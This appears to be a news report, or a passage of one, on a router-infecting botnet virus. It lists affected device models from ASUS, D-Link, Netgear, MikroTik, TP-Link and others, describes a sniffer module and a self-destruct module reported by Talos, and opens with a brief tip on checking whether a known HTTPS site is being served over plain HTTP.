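Run `probe("www.example.com")` from a client behind the router in question; a "serves-plain-http" verdict for a site that is known to redirect to HTTPS is worth investigating.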

It was reported earlier that the router models most vulnerable to this virus are devices made by ASUS, D-Link, Huawei, Ubiquiti, UPVEL and ZTE. In fact, the range of devices vulnerable to the virus is much wider and includes models from Linksys, MikroTik, Netgear and TP-Link.

Full list of vulnerable devices

Asus:
RT-AC66U (new)
RT-N10 (new)
RT-N10E (new)
RT-N10U (new)
RT-N56U (new)
RT-N66U (new)

D-Link:
DES-1210-08P (new)
DIR-300 (new)
DIR-300A (new)
DSR-250N (new)
DSR-500N (new)
DSR-1000 (new)
DSR-1000N (new)

Huawei:
HG8245 (new)

Linksys:
E1200
E2500
E3000 (new)
E3200 (new)
E4200 (new)
RV082 (new)
WRVS4400N

Mikrotik:
CCR1009 (new)
CCR1016
CCR1036
CCR1072
CRS109 (new)
CRS112 (new)
CRS125 (new)
RB411 (new)
RB450 (new)
RB750 (new)
RB911 (new)
RB921 (new)
RB941 (new)
RB951 (new)
RB952 (new)
RB960 (new)
RB962 (new)
RB1100 (new)
RB1200 (new)
RB2011 (new)
RB3011 (new)
RB Groove (new)
RB Omnitik (new)
STX5 (new)

Netgear:
DG834 (new)
DGN1000 (new)
DGN2200
DGN3500 (new)
FVS318N (new)
MBRN3000 (new)
R6400
R7000
R8000
WNR1000
WNR2000
WNR2200 (new)
WNR4000 (new)
WNDR3700 (new)
WNDR4000 (new)
WNDR4300 (new)
WNDR4300-TN (new)
UTM50 (new)

QNAP:
TS251
TS439 Pro
Other QNAP NAS with QTS

TP-Link:
R600VPN
TL-WR741ND (new)
TL-WR841N (new)

Ubiquiti:
NSM2 (new)
PBE M5 (new)

Upvel:
Unknown Models * (new)

ZTE:
ZXHN H108N (new)

And that is not all

In addition to everything announced above, Talos reported the discovery of a sniffer module. It analyzes traffic in search of a certain type of data associated with the operation of industrial systems. That traffic passes through the TP-Link R600, which the module identifies. The module also looks for IP addresses from a specific range and for data packets of 150 bytes or more.

“The creators of the virus are looking for very specific things. They don't try to collect as much of the available information as possible, not at all. They need passwords, logins, access to a specific IP range and the like. We are trying to understand who might need all this,” the researchers say.

And that is still not all: the virus is now being updated, and a self-destruction module has appeared in its functionality. When the module is activated, the virus removes itself from the device without leaving any traces.

Although the FBI discovered and seized the main server about a week ago, the botnet is still active; the measures taken were clearly not enough.
